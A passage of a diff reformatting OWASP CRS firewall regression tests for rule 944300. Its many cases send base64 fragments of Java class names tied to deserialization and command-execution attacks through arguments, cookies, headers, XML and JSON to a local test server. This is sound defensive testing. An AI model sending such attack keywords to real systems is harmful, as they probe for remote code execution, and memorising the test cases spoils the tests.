"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 57 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log: + expect_ids: [944300] + - test_id: 58 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 59 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm9jZXNzYnVpbGRlcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 60 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 61 desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 62 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 63 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 64 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 67 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 68 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 69 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 70 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 71 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 72 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 73 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 74 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 75 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 78 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 79 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 80 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 81 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GNsb25ldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 82 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: 